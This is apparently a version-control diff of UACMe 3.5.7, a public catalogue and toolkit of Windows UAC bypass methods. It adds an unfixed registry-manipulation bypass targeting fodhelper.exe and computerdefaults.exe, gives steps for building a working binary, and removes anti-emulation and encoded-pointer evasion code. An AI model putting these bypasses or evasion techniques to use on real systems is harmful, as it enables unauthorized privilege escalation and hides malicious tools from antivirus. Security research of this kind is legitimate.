v 3.5.7

Method 70 added;
Methods 23, 36 reimplemented for win11 support;
UAS patterns updated;
Readme updated.

Author: hfiref0x

README.md

@@ -375,7 +375,7 @@ First parameter is number of method to use, second is optional command (executab
 36. Author: Thomas Vanhoutte aka SandboxEscaper
      * Type: Race condition
      * Method: NTFS reparse point & Dll Hijack
-     * Target(s): wusa.exe
+     * Target(s): wusa.exe, pkgmgr.exe
      * Component(s): Attacker defined
      * Implementation: ucmJunctionMethod
      * Works from: Windows 7 (7600)
@@ -577,11 +577,11 @@ First parameter is number of method to use, second is optional command (executab
      * Method: Registry key manipulation
      * Target(s): \system32\WSReset.exe
      * Component(s): Attacker defined
-     * Implementation: ucmShellRegModMethod
+     * Implementation: ucmShellRegModMethod2
      * Works from: Windows 10 (17134)
-     * Fixed in: unfixed :see_no_evil:
-        * How: -
-      * Code status: added in v3.1.7
+     * Fixed in: Windows 11 (22000)
+        * How: Windows components redesign
+      * Code status: removed starting from v3.5.7 :tractor:
 57. Author: Leo Davidson derivative by Win32/Gapz
      * Type: Dll Hijack
      * Method: IFileOperation
@@ -713,6 +713,16 @@ First parameter is number of method to use, second is optional command (executab
      * Fixed in: unfixed :see_no_evil:
         * How: -
       * Code status: added in v3.5.6
+70. Author: V3ded
+     * Type: Shell API
+     * Method: Registry key manipulation
+     * Target(s): \system32\fodhelper.exe, \system32\computerdefaults.exe
+     * Component(s): Attacker defined
+     * Implementation: ucmShellRegModMethod3
+     * Works from: Windows 10 (10240)
+     * Fixed in: unfixed :see_no_evil:
+        * How: -
+      * Code status: added in v3.5.7
 
 </details>
 
@@ -768,25 +778,21 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
 ## Instructions
 
 * Select Platform ToolSet first for project in solution you want to build (Project->Properties->General): 
-  * v120 for Visual Studio 2013;
   * v140 for Visual Studio 2015; 
   * v141 for Visual Studio 2017;
   * v142 for Visual Studio 2019.
 * For v140 and above set Target Platform Version (Project->Properties->General):
   * If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);
-  * If v141/v142 then select 10 (Note that Windows 10 SDK must be installed). 
+  * If v141/v142 then select 10 (Note that Windows 10 (19041) SDK must be installed). 
 
 * To build working binary:
-  * Undefine KUMA_STUB
   * Compile payload units
   * Compile Naka module
   * Encrypt all payload units using Naka module
   * Generate secret blobs for these units using Naka module
   * Move compiled units and secret blobs to the Akagi\Bin directory
   * Rebuild Akagi
 
-* Can be built with SDK 8.1 and later versions.
-
 # References
 
 * Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
@@ -818,6 +824,7 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
 * Microsoft Windows 10 UAC bypass local privilege escalation exploit, https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html
 * UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html
 * UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
+* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
 
 # Authors
 

Source/Akagi/Resource.rc

@@ -4,9 +4,9 @@
 *
 *  TITLE:       GLOBAL.H
 *
-*  VERSION:     3.56
+*  VERSION:     3.57
 *
-*  DATE:        30 July 2021
+*  DATE:        01 Nov 2021
 *
 *  Common header file for the program support routines.
 *
@@ -22,10 +22,6 @@
 #error ANSI build is not supported
 #endif
 
-#ifndef _DEBUG
-#define KUMA_STUB
-#endif
-
 #include "shared\libinc.h"
 
 //disable nonmeaningful warnings.
@@ -158,13 +154,5 @@ typedef UINT(WINAPI *pfnEntryPoint)(
     _In_ BOOL OutputToDebugger
     );
 
-typedef struct _UACME_THREAD_CONTEXT {
-    TEB_ACTIVE_FRAME Frame;
-    pfnEntryPoint ucmMain;
-    NTSTATUS ReturnedResult;
-    ULONG OptionalParameterLength;
-    LPWSTR OptionalParameter;
-} UACME_THREAD_CONTEXT, *PUACME_THREAD_CONTEXT;
-
 extern PUACMECONTEXT g_ctx;
 extern HINSTANCE g_hInstance;

Source/Akagi/global.h

@@ -4,9 +4,9 @@
 *
 *  TITLE:       MAIN.C
 *
-*  VERSION:     3.56
+*  VERSION:     3.57
 *
-*  DATE:        17 July 2021
+*  DATE:        01 Nov 2021
 *
 *  Program entry point.
 *
@@ -26,33 +26,6 @@ PUACMECONTEXT g_ctx;
 //Image Base Address global variable
 HINSTANCE g_hInstance;
 
-TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "<??>" };
-
-/*
-* ucmDummyWindowProc
-*
-* Purpose:
-*
-* Part of antiemulation, does nothing.
-*
-*/
-LRESULT CALLBACK ucmDummyWindowProc(
-    HWND hwnd,
-    UINT uMsg,
-    WPARAM wParam,
-    LPARAM lParam
-)
-{
-    switch (uMsg) {
-    case WM_SHOWWINDOW:
-        SendMessage(hwnd, WM_CLOSE, 0, 0);
-        break;
-    case WM_CLOSE:
-        PostQuitMessage(0);
-        break;
-    }
-    return DefWindowProc(hwnd, uMsg, wParam, lParam);
-}
 
 /*
 * ucmInit
@@ -77,19 +50,13 @@ NTSTATUS ucmInit(
     NTSTATUS    Result = STATUS_SUCCESS;
     LPWSTR      optionalParameter = NULL;
     ULONG       optionalParameterLength = 0;
-    MSG         msg1;
-    WNDCLASSEX  wincls;
-    BOOL        rv = 1;
-    HWND        TempWindow;
 
 #ifndef _DEBUG
     TOKEN_ELEVATION_TYPE    ElevType;
 #endif	
 
     ULONG bytesIO;
     WCHAR szBuffer[MAX_PATH + 1];
-    WCHAR WndClassName[] = TEXT("reyortseD");
-    WCHAR WndTitleName[] = TEXT("ikibiH");
 
 
     do {
@@ -167,49 +134,6 @@ NTSTATUS ucmInit(
             optionalParameterLength = OptionalParameterLength;
         }
 
-        wincls.cbSize = sizeof(WNDCLASSEX);
-        wincls.style = CS_OWNDC;
-        wincls.lpfnWndProc = &ucmDummyWindowProc;
-        wincls.cbClsExtra = 0;
-        wincls.cbWndExtra = 0;
-        wincls.hInstance = g_hInstance;
-        wincls.hIcon = NULL;
-        wincls.hCursor = (HCURSOR)LoadImage(NULL, MAKEINTRESOURCE(OCR_NORMAL), IMAGE_CURSOR, 0, 0, LR_SHARED);
-        wincls.hbrBackground = NULL;
-        wincls.lpszMenuName = NULL;
-        wincls.lpszClassName = WndClassName;
-        wincls.hIconSm = 0;
-
-        RegisterClassEx(&wincls);
-
-        TempWindow = CreateWindowEx(WS_EX_TOPMOST, 
-            WndClassName,
-            WndTitleName,
-            WS_VISIBLE | WS_POPUP | WS_CLIPCHILDREN | WS_CLIPSIBLINGS, 
-            0, 0, 
-            32, 
-            32, 
-            NULL, NULL, 
-            g_hInstance, 
-            NULL);
-
-        if (TempWindow)
-            return STATUS_FATAL_APP_EXIT;
-
-        do {
-            rv = GetMessage(&msg1, NULL, 0, 0);
-
-            if (rv == -1) {
-                return STATUS_FATAL_APP_EXIT;
-            }
-
-            TranslateMessage(&msg1);
-            DispatchMessage(&msg1);
-
-        } while (rv != 0);
-
-        UnregisterClass(WndClassName, g_hInstance);
-
         g_ctx = (PUACMECONTEXT)supCreateUacmeContext(Method,
             optionalParameter,
             optionalParameterLength,
@@ -282,45 +206,6 @@ NTSTATUS WINAPI ucmMain(
     return MethodsManagerCall(method);
 }
 
-/*
-* ucmSehHandler
-*
-* Purpose:
-*
-* Program entry point seh handler, indirect control passing.
-*
-*/
-INT ucmSehHandler(
-    _In_ UINT ExceptionCode,
-    _In_ EXCEPTION_POINTERS *ExceptionInfo
-)
-{
-    UACME_THREAD_CONTEXT *uctx;
-
-    UNREFERENCED_PARAMETER(ExceptionInfo);
-
-    if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) {
-        uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();
-        while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {
-            uctx = (UACME_THREAD_CONTEXT *)uctx->Frame.Previous;
-        }
-        if (uctx) {
-            if (uctx->ucmMain) {
-                uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain);
-                
-                uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid, 
-                    NULL, 
-                    0, 
-                    FALSE);
-            }
-        }
-        return EXCEPTION_EXECUTE_HANDLER;
-    }
-    return EXCEPTION_CONTINUE_SEARCH;
-}
-
-#ifndef KUMA_STUB
-
 /*
 * main
 *
@@ -332,30 +217,10 @@ INT ucmSehHandler(
 #pragma comment(linker, "/ENTRY:main")
 VOID __cdecl main()
 {
-    int v = 1, d = 0;
-    UACME_THREAD_CONTEXT uctx;
-
-    RtlSecureZeroMemory(&uctx, sizeof(uctx));
-
-    if (wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) {
-
-        uctx.Frame.Context = &g_fctx;
-        uctx.ucmMain = (pfnEntryPoint)supEncodePointer(ucmMain);
-        RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
-
-        __try {
-            v = (int)USER_SHARED_DATA->NtProductType;
-            d = (int)USER_SHARED_DATA->AlternativeArchitecture;
-            v = (int)(v / d);
-        }
-        __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {
-            v = 1;
-        }
-
-        RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);
-    }
-    if (v > 0)
-        ExitProcess(uctx.ReturnedResult);
-}
-
+#ifdef _WIN64
+    __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
+#else
+    __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
 #endif
+    ExitProcess(StubInit());
+}